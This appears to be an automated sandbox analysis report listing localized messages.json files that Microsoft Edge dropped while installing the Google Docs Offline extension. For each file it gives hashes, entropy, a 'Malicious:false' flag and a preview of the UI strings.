                                                                                                                                                                                                                                                                                                  Preview:{"createnew":{"message":"\u0a28\u0a35\u0a3e\u0a02 \u0a2c\u0a23\u0a3e\u0a13"},"explanationofflinedisabled":{"message":"\u0a24\u0a41\u0a38\u0a40\u0a02 \u0a06\u0a2b\u0a3c\u0a32\u0a3e\u0a08\u0a28 \u0a39\u0a4b\u0964 \u0a07\u0a70\u0a1f\u0a30\u0a28\u0a48\u0a71\u0a1f \u0a15\u0a28\u0a48\u0a15\u0a36\u0a28 \u0a26\u0a47 \u0a2c\u0a3f\u0a28\u0a3e\u0a02 Google Docs \u0a28\u0a42\u0a70 \u0a35\u0a30\u0a24\u0a23 \u0a32\u0a08, \u0a05\u0a17\u0a32\u0a40 \u0a35\u0a3e\u0a30 \u0a1c\u0a26\u0a4b\u0a02 \u0a24\u0a41\u0a38\u0a40\u0a02 \u0a07\u0a70\u0a1f\u0a30\u0a28\u0a48\u0a71\u0a1f \u0a26\u0a47 \u0a28\u0a3e\u0a32 \u0a15\u0a28\u0a48\u0a15\u0a1f \u0a39\u0a4b\u0a35\u0a4b \u0a24\u0a3e\u0a02 Google Docs \u0a2e\u0a41\u0a71\u0a16 \u0a2a\u0a70\u0a28\u0a47 '\u0a24\u0a47 \u0a38\u0a48\u0a1f\u0a3f\u0a70\u0a17\u0a3e\u0a02 \u0a35\u0a3f\u0a71\u0a1a \u0a1c\u0a3e\u0a13 \u0a05\u0a24\u0a47 \u0a06\u0a2b\u0a3c\u0a32\u0a3e\u0a08\u0a28 \u0a38\u0a3f\u0a70\u0a15 \u0a28\u0a42\u0a70 \u0a1a\u0a3e\u0a32\u0a42 \u0a15\u0a30\u0a4b\u0964"},"expla

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5668_1639322818\CRX_INSTALL\_locales\pl\messages.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):978
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.879137540019932
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HApiJiRelvm3wi8QAYcbm24sK+tFJaSDD:FJMx3whxYcbNp
                                                                                                                                                                                                                                                                                                  MD5:B8D55E4E3B9619784AECA61BA15C9C0F
                                                                                                                                                                                                                                                                                                  SHA1:B4A9C9885FBEB78635957296FDDD12579FEFA033
                                                                                                                                                                                                                                                                                                  SHA-256:E00FF20437599A5C184CA0C79546CB6500171A95E5F24B9B5535E89A89D3EC3D
                                                                                                                                                                                                                                                                                                  SHA-512:266589116EEE223056391C65808255EDAE10EB6DC5C26655D96F8178A41E283B06360AB8E08AC3857D172023C4F616EF073D0BEA770A3B3DD3EE74F5FFB2296B
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "UTW.RZ NOWY".. },.. "explanationofflinedisabled": {.. "message": "Jeste. offline. Aby korzysta. z Dokument.w Google bez po..czenia internetowego, otw.rz ustawienia na stronie g..wnej Dokument.w Google i w..cz synchronizacj. offline nast.pnym razem, gdy b.dziesz mie. dost.p do internetu.".. },.. "explanationofflineenabled": {.. "message": "Jeste. offline, ale nadal mo.esz edytowa. dost.pne pliki i tworzy. nowe.".. },.. "extdesc": {.. "message": "Edytuj, tw.rz i wy.wietlaj swoje dokumenty, arkusze kalkulacyjne oraz prezentacje bez konieczno.ci ..czenia si. z internetem.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Wi.cej informacji".. },.. "popuphelptext": {.. "message": "Pisz, edytuj i wsp..pracuj, gdziekolwiek jeste. . niezale.nie od tego, czy masz po..czenie z internetem.".. }..}..

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5668_1639322818\CRX_INSTALL\_locales\pt_BR\messages.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):907
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.599411354657937
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvgU30CBxNd6GwXOK1styCJ02OK9+4KbCBxed6X4LBAt4rXgUCSUuYDHIIQka:1HAcXlyCJ5+Tsz4LY4rXSw/Q+ftkC
                                                                                                                                                                                                                                                                                                  MD5:608551F7026E6BA8C0CF85D9AC11F8E3
                                                                                                                                                                                                                                                                                                  SHA1:87B017B2D4DA17E322AF6384F82B57B807628617
                                                                                                                                                                                                                                                                                                  SHA-256:A73EEA087164620FA2260D3910D3FBE302ED85F454EDB1493A4F287D42FC882F
                                                                                                                                                                                                                                                                                                  SHA-512:82F52F8591DB3C0469CC16D7CBFDBF9116F6D5B5D2AD02A3D8FA39CE1378C64C0EA80AB8509519027F71A89EB8BBF38A8702D9AD26C8E6E0F499BF7DA18BF747
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Voc. est. off-line. Para usar o Documentos Google sem conex.o com a Internet, na pr.xima vez que se conectar, acesse as configura..es na p.gina inicial do Documentos Google e ative a sincroniza..o off-line.".. },.. "explanationofflineenabled": {.. "message": "Voc. est. off-line, mas mesmo assim pode editar os arquivos dispon.veis ou criar novos arquivos.".. },.. "extdesc": {.. "message": "Edite, crie e veja seus documentos, planilhas e apresenta..es sem precisar de acesso . Internet.".. },.. "extname": {.. "message": "Documentos Google off-line".. },.. "learnmore": {.. "message": "Saiba mais".. },.. "popuphelptext": {.. "message": "Escreva, edite e colabore onde voc. estiver, com ou sem conex.o com a Internet.".. }..}..

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5668_1639322818\CRX_INSTALL\_locales\pt_PT\messages.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):914
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.604761241355716
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAcXzw8M+N0STDIjxX+qxCjKw5BKriEQFMJXkETs:zXzw0pKXbxqKw5BKri3aNY
                                                                                                                                                                                                                                                                                                  MD5:0963F2F3641A62A78B02825F6FA3941C
                                                                                                                                                                                                                                                                                                  SHA1:7E6972BEAB3D18E49857079A24FB9336BC4D2D48
                                                                                                                                                                                                                                                                                                  SHA-256:E93B8E7FB86D2F7DFAE57416BB1FB6EE0EEA25629B972A5922940F0023C85F90
                                                                                                                                                                                                                                                                                                  SHA-512:22DD42D967124DA5A2209DD05FB6AD3F5D0D2687EA956A22BA1E31C56EC09DEB53F0711CD5B24D672405358502E9D1C502659BB36CED66CAF83923B021CA0286
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est. offline. Para utilizar o Google Docs sem uma liga..o . Internet, aceda .s defini..es na p.gina inicial do Google Docs e ative a sincroniza..o offline da pr.xima vez que estiver ligado . Internet.".. },.. "explanationofflineenabled": {.. "message": "Est. offline, mas continua a poder editar os ficheiros dispon.veis ou criar novos ficheiros.".. },.. "extdesc": {.. "message": "Edite, crie e veja os documentos, as folhas de c.lculo e as apresenta..es, tudo sem precisar de aceder . Internet.".. },.. "extname": {.. "message": "Google Docs offline".. },.. "learnmore": {.. "message": "Saber mais".. },.. "popuphelptext": {.. "message": "Escreva edite e colabore onde quer que esteja, com ou sem uma liga..o . Internet.".. }..}..

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5668_1639322818\CRX_INSTALL\_locales\ro\messages.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):937
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.686555713975264
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HA8dC6e6w+uFPHf2TFMMlecFpweWV4RE:pC6KvHf4plVweCx
                                                                                                                                                                                                                                                                                                  MD5:BED8332AB788098D276B448EC2B33351
                                                                                                                                                                                                                                                                                                  SHA1:6084124A2B32F386967DA980CBE79DD86742859E
                                                                                                                                                                                                                                                                                                  SHA-256:085787999D78FADFF9600C9DC5E3FF4FB4EB9BE06D6BB19DF2EEF8C284BE7B20
                                                                                                                                                                                                                                                                                                  SHA-512:22596584D10707CC1C8179ED3ABE46EF2C314CF9C3D0685921475944B8855AAB660590F8FA1CFDCE7976B4BB3BD9ABBBF053F61F1249A325FD0094E1C95692ED
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CREEAZ. UN DOCUMENT".. },.. "explanationofflinedisabled": {.. "message": "E.ti offline. Pentru a utiliza Documente Google f.r. conexiune la internet, intr. .n set.rile din pagina principal. Documente Google .i activeaz. sincronizarea offline data viitoare c.nd e.ti conectat(.) la internet.".. },.. "explanationofflineenabled": {.. "message": "E.ti offline, dar po.i .nc. s. editezi fi.ierele disponibile sau s. creezi altele.".. },.. "extdesc": {.. "message": "Editeaz., creeaz. .i acceseaz. documente, foi de calcul .i prezent.ri - totul f.r. acces la internet.".. },.. "extname": {.. "message": "Documente Google Offline".. },.. "learnmore": {.. "message": "Afl. mai multe".. },.. "popuphelptext": {.. "message": "Scrie, editeaz. .i colaboreaz. oriunde ai fi, cu sau f.r. conexiune la internet.".. }..}..

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5668_1639322818\CRX_INSTALL\_locales\ru\messages.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):1337
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.69531415794894
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HABEapHTEmxUomjsfDVs8THjqBK8/hHUg41v+Lph5eFTHQ:I/VdxUomjsre8Kh4Riph5eFU
                                                                                                                                                                                                                                                                                                  MD5:51D34FE303D0C90EE409A2397FCA437D
                                                                                                                                                                                                                                                                                                  SHA1:B4B9A7B19C62D0AA95D1F10640A5FBA628CCCA12
                                                                                                                                                                                                                                                                                                  SHA-256:BE733625ACD03158103D62BC0EEF272CA3F265AC30C87A6A03467481A177DAE3
                                                                                                                                                                                                                                                                                                  SHA-512:E8670DED44DC6EE30E5F41C8B2040CF8A463CD9A60FC31FA70EB1D4C9AC1A3558369792B5B86FA761A21F5266D5A35E5C2C39297F367DAA84159585C19EC492A
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": ".......".. },.. "explanationofflinedisabled": {.. "message": "..... ............ Google ......... ... ........., ............ . .... . ......... ............. . ......-...... . .......... .. ......... .........".. },.. "explanationofflineenabled": {.. "message": "... ........... . .......... .. ...... ......... ..... ..... . ............. .., . ....... ........ ......-.......".. },.. "extdesc": {.. "message": ".........., .............. . ............ ........., ....... . ........... ... ....... . ..........".. },.. "extname": {.. "message": "Google.......... ......".. },.. "learnmore": {.

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5668_1639322818\CRX_INSTALL\_locales\si\messages.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):2846
                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.7416822879702547
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:48:YWi+htQTKEQb3aXQYJLSWy7sTQThQTnQtQTrEmQ6kiLsegQSJFwsQGaiPn779I+S:zhiTK5b3tUGVjTGTnQiTryOLpyaxYf/S
                                                                                                                                                                                                                                                                                                  MD5:B8A4FD612534A171A9A03C1984BB4BDD
                                                                                                                                                                                                                                                                                                  SHA1:F513F7300827FE352E8ECB5BD4BB1729F3A0E22A
                                                                                                                                                                                                                                                                                                  SHA-256:54241EBE651A8344235CC47AFD274C080ABAEBC8C3A25AFB95D8373B6A5670A2
                                                                                                                                                                                                                                                                                                  SHA-512:C03E35BFDE546AEB3245024EF721E7E606327581EFE9EAF8C5B11989D9033BDB58437041A5CB6D567BAA05466B6AAF054C47F976FD940EEEDF69FDF80D79095B
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"createnew":{"message":"\u0db1\u0dc0 \u0dbd\u0dda\u0d9b\u0db1\u0dba\u0d9a\u0dca \u0dc3\u0dcf\u0daf\u0db1\u0dca\u0db1"},"explanationofflinedisabled":{"message":"\u0d94\u0db6 \u0db1\u0ddc\u0db6\u0dd0\u0db3\u0dd2\u0dba. \u0d85\u0db1\u0dca\u0dad\u0dbb\u0dca\u0da2\u0dcf\u0dbd \u0dc3\u0db8\u0dca\u0db6\u0db1\u0dca\u0db0\u0dad\u0dcf\u0dc0\u0d9a\u0dca \u0db1\u0ddc\u0db8\u0dd0\u0dad\u0dd2\u0dc0 Google Docs \u0db7\u0dcf\u0dc0\u0dd2\u0dad \u0d9a\u0dd2\u0dbb\u0dd3\u0db8\u0da7, Google Docs \u0db8\u0dd4\u0dbd\u0dca \u0db4\u0dd2\u0da7\u0dd4\u0dc0 \u0db8\u0dad \u0dc3\u0dd0\u0d9a\u0dc3\u0dd3\u0db8\u0dca \u0dc0\u0dd9\u0dad \u0d9c\u0ddc\u0dc3\u0dca \u0d94\u0db6 \u0d8a\u0dc5\u0d9f \u0d85\u0dc0\u0dc3\u0dca\u0dae\u0dcf\u0dc0\u0dda \u0d85\u0db1\u0dca\u0dad\u0dbb\u0dca\u0da2\u0dcf\u0dbd\u0dba\u0da7 \u0dc3\u0db6\u0dd0\u0db3\u0dd2 \u0dc0\u0dd2\u0da7 \u0db1\u0ddc\u0db6\u0dd0\u0db3\u0dd2 \u0dc3\u0db8\u0db8\u0dd4\u0dc4\u0dd4\u0dbb\u0dca\u0dad \u0d9a\u0dd2\u0dbb\u0dd3\u0db8 \u0d9a\u0dca\u200d\u0dbb\u0dd2\u0dba\u0dc

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5668_1639322818\CRX_INSTALL\_locales\sk\messages.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):934
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.882122893545996
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAF8pMv1RS4LXL22IUjdh8uJwpPqLDEtxKLhSS:hyv1RS4LXx38u36QsS
                                                                                                                                                                                                                                                                                                  MD5:8E55817BF7A87052F11FE554A61C52D5
                                                                                                                                                                                                                                                                                                  SHA1:9ABDC0725FE27967F6F6BE0DF5D6C46E2957F455
                                                                                                                                                                                                                                                                                                  SHA-256:903060EC9E76040B46DEB47BBB041D0B28A6816CB9B892D7342FC7DC6782F87C
                                                                                                                                                                                                                                                                                                  SHA-512:EFF9EC7E72B272DDE5F29123653BC056A4BC2C3C662AE3C448F8CB6A4D1865A0679B7E74C1B3189F3E262109ED6BC8F8D2BDE14AEFC8E87E0F785AE4837D01C7
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "VYTVORI. NOV.".. },.. "explanationofflinedisabled": {.. "message": "Ste offline. Ak chcete pou.i. Dokumenty Google bez pripojenia na internet, po najbli..om pripojen. na internet prejdite do nastaven. na domovskej str.nke Dokumentov Google a.zapnite offline synchroniz.ciu.".. },.. "explanationofflineenabled": {.. "message": "Ste offline, no st.le m..ete upravova. dostupn. s.bory a.vytv.ra. nov..".. },.. "extdesc": {.. "message": ".prava, tvorba a.zobrazenie dokumentov, tabuliek a.prezent.ci.. To v.etko bez pr.stupu na internet.".. },.. "extname": {.. "message": "Dokumenty Google v re.ime offline".. },.. "learnmore": {.. "message": ".al.ie inform.cie".. },.. "popuphelptext": {.. "message": "P..te, upravujte a.spolupracuje, kdeko.vek ste, a.to s.pripojen.m na internet aj bez neho.".. }..}..

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5668_1639322818\CRX_INSTALL\_locales\sl\messages.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):963
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.6041913416245
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvgfECBxNFCEuKXowwJrpvPwNgEcPJJJEfWOCBxeFCJuGuU4KYXCSUXKDxX4A:1HAXMKYw8VYNLcaeDmKYLdX2zJBG5
                                                                                                                                                                                                                                                                                                  MD5:BFAEFEFF32813DF91C56B71B79EC2AF4
                                                                                                                                                                                                                                                                                                  SHA1:F8EDA2B632610972B581724D6B2F9782AC37377B
                                                                                                                                                                                                                                                                                                  SHA-256:AAB9CF9098294A46DC0F2FA468AFFF7CA7C323A1A0EFA70C9DB1E3A4DA05D1D4
                                                                                                                                                                                                                                                                                                  SHA-512:971F2BBF5E9C84DE3D31E5F2A4D1A00D891A2504F8AF6D3F75FC19056BFD059A270C4C9836AF35258ABA586A1888133FB22B484F260C1CBC2D1D17BC3B4451AA
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "USTVARI NOVO".. },.. "explanationofflinedisabled": {.. "message": "Nimate vzpostavljene povezave. .e .elite uporabljati Google Dokumente brez internetne povezave, odprite nastavitve na doma.i strani Google Dokumentov in vklopite sinhronizacijo brez povezave, ko naslednji. vzpostavite internetno povezavo.".. },.. "explanationofflineenabled": {.. "message": "Nimate vzpostavljene povezave, vendar lahko .e vedno urejate razpolo.ljive datoteke ali ustvarjate nove.".. },.. "extdesc": {.. "message": "Urejajte, ustvarjajte in si ogledujte dokumente, preglednice in predstavitve . vse to brez internetnega dostopa.".. },.. "extname": {.. "message": "Google Dokumenti brez povezave".. },.. "learnmore": {.. "message": "Ve. o tem".. },.. "popuphelptext": {.. "message": "Pi.ite, urejajte in sodelujte, kjer koli ste, z internetno povezavo ali brez nje.".. }..}..

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5668_1639322818\CRX_INSTALL\_locales\sr\messages.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):1320
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.569671329405572
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HArg/fjQg2JwrfZtUWTrw1P4epMnRGi5TBmuPDRxZQ/XtiCw/Rwh/Q9EVz:ogUg2JwDZe6rwKI8VTP9xK1CwhI94
                                                                                                                                                                                                                                                                                                  MD5:7F5F8933D2D078618496C67526A2B066
                                                                                                                                                                                                                                                                                                  SHA1:B7050E3EFA4D39548577CF47CB119FA0E246B7A4
                                                                                                                                                                                                                                                                                                  SHA-256:4E8B69E864F57CDDD4DC4E4FAF2C28D496874D06016BC22E8D39E0CB69552769
                                                                                                                                                                                                                                                                                                  SHA-512:0FBAB56629368EEF87DEEF2977CA51831BEB7DEAE98E02504E564218425C751853C4FDEAA40F51ECFE75C633128B56AE105A6EB308FD5B4A2E983013197F5DBA
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "....... ....".. },.. "explanationofflinedisabled": {.. "message": "...... .... .. ..... ......... Google ......... ... ........ ...., ..... . .......... .. ........ ........ Google .......... . ........ ...... .............. ... ....... ... ...... ........ .. ...........".. },.. "explanationofflineenabled": {.. "message": "...... ..., ... . .... ...... .. ....... ...... . ........ ........ ... .. ....... .....".. },.. "extdesc": {.. "message": "....... . ........... ........., ...... . ............ . ....... ...... . ... . ... .. ... ........ .........".. },.. "extname": {.. "message

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5668_1639322818\CRX_INSTALL\_locales\sv\messages.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):884
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.627108704340797
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HA0NOYT/6McbnX/yzklyOIPRQrJlvDymvBd:vNOcyHnX/yg0P4Bymn
                                                                                                                                                                                                                                                                                                  MD5:90D8FB448CE9C0B9BA3D07FB8DE6D7EE
                                                                                                                                                                                                                                                                                                  SHA1:D8688CAC0245FD7B886D0DEB51394F5DF8AE7E84
                                                                                                                                                                                                                                                                                                  SHA-256:64B1E422B346AB77C5D1C77142685B3FF7661D498767D104B0C24CB36D0EB859
                                                                                                                                                                                                                                                                                                  SHA-512:6D58F49EE3EF0D3186EA036B868B2203FE936CE30DC8E246C32E90B58D9B18C624825419346B62AF8F7D61767DBE9721957280AA3C524D3A5DFB1A3A76C00742
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "SKAPA NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du .r offline. Om du vill anv.nda Google Dokument utan internetuppkoppling, .ppna inst.llningarna p. Google Dokuments startsida och aktivera offlinesynkronisering n.sta g.ng du .r ansluten till internet.".. },.. "explanationofflineenabled": {.. "message": "Du .r offline, men det g.r fortfarande att redigera tillg.ngliga filer eller skapa nya.".. },.. "extdesc": {.. "message": "Redigera, skapa och visa dina dokument, kalkylark och presentationer . helt utan internet.tkomst.".. },.. "extname": {.. "message": "Google Dokument Offline".. },.. "learnmore": {.. "message": "L.s mer".. },.. "popuphelptext": {.. "message": "Skriv, redigera och samarbeta .verallt, med eller utan internetanslutning.".. }..}..

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5668_1639322818\CRX_INSTALL\_locales\sw\messages.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):980
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.50673686618174
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvgNHCBxNx1HMHyMhybK7QGU78oCuafIvfCBxex6EYPE5E1pOCSUJqONtCBh8:1HAGDQ3y0Q/Kjp/zhDoKMkeAT6dBaX
                                                                                                                                                                                                                                                                                                  MD5:D0579209686889E079D87C23817EDDD5
                                                                                                                                                                                                                                                                                                  SHA1:C4F99E66A5891973315D7F2BC9C1DAA524CB30DC
                                                                                                                                                                                                                                                                                                  SHA-256:0D20680B74AF10EF8C754FCDE259124A438DCE3848305B0CAF994D98E787D263
                                                                                                                                                                                                                                                                                                  SHA-512:D59911F91ED6C8FF78FD158389B4D326DAF4C031B940C399569FE210F6985E23897E7F404B7014FC7B0ACEC086C01CC5F76354F7E5D3A1E0DEDEF788C23C2978
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "FUNGUA MPYA".. },.. "explanationofflinedisabled": {.. "message": "Haupo mtandaoni. Ili uweze kutumia Hati za Google bila muunganisho wa intaneti, wakati utakuwa umeunganishwa kwenye intaneti, nenda kwenye sehemu ya mipangilio kwenye ukurasa wa kwanza wa Hati za Google kisha uwashe kipengele cha usawazishaji nje ya mtandao.".. },.. "explanationofflineenabled": {.. "message": "Haupo mtandaoni, lakini bado unaweza kubadilisha faili zilizopo au uunde mpya.".. },.. "extdesc": {.. "message": "Badilisha, unda na uangalie hati, malahajedwali na mawasilisho yako . yote bila kutumia muunganisho wa intaneti.".. },.. "extname": {.. "message": "Hati za Google Nje ya Mtandao".. },.. "learnmore": {.. "message": "Pata Maelezo Zaidi".. },.. "popuphelptext": {.. "message": "Andika hati, zibadilishe na ushirikiane na wengine popote ulipo, iwe una muunganisho wa intaneti au huna.".. }..}..

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5668_1639322818\CRX_INSTALL\_locales\ta\messages.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):1941
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.132139619026436
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAoTZwEj3YfVLiANpx96zjlXTwB4uNJDZwq3CP1B2xIZiIH1CYFIZ03SoFyxrph:JCEjWiAD0ZXkyYFyPND1L/I
                                                                                                                                                                                                                                                                                                  MD5:DCC0D1725AEAEAAF1690EF8053529601
                                                                                                                                                                                                                                                                                                  SHA1:BB9D31859469760AC93E84B70B57909DCC02EA65
                                                                                                                                                                                                                                                                                                  SHA-256:6282BF9DF12AD453858B0B531C8999D5FD6251EB855234546A1B30858462231A
                                                                                                                                                                                                                                                                                                  SHA-512:6243982D764026D342B3C47C706D822BB2B0CAFFA51F0591D8C878F981EEF2A7FC68B76D012630B1C1EB394AF90EB782E2B49329EB6538DD5608A7F0791FDCF5
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "..... ....... .........".. },.. "explanationofflinedisabled": {.. "message": ".......... ........... .... ....... ..... Google ......... .........., ...... .... ........... ......... ...., Google ... ................... ................ ......, ........ ......... ..........".. },.. "explanationofflineenabled": {.. "message": ".......... ..........., .......... .......... .......... ......... ........... ...... .....

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5668_1639322818\CRX_INSTALL\_locales\te\messages.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):1969
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.327258153043599
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:48:R7jQrEONienBcFNBNieCyOBw0/kCcj+sEf24l+Q+u1LU4ljCj55ONipR41ssrNix:RjQJN1nBcFNBNlCyGcj+RXl+Q+u1LU4s
                                                                                                                                                                                                                                                                                                  MD5:385E65EF723F1C4018EEE6E4E56BC03F
                                                                                                                                                                                                                                                                                                  SHA1:0CEA195638A403FD99BAEF88A360BD746C21DF42
                                                                                                                                                                                                                                                                                                  SHA-256:026C164BAE27DBB36A564888A796AA3F188AAD9E0C37176D48910395CF772CEA
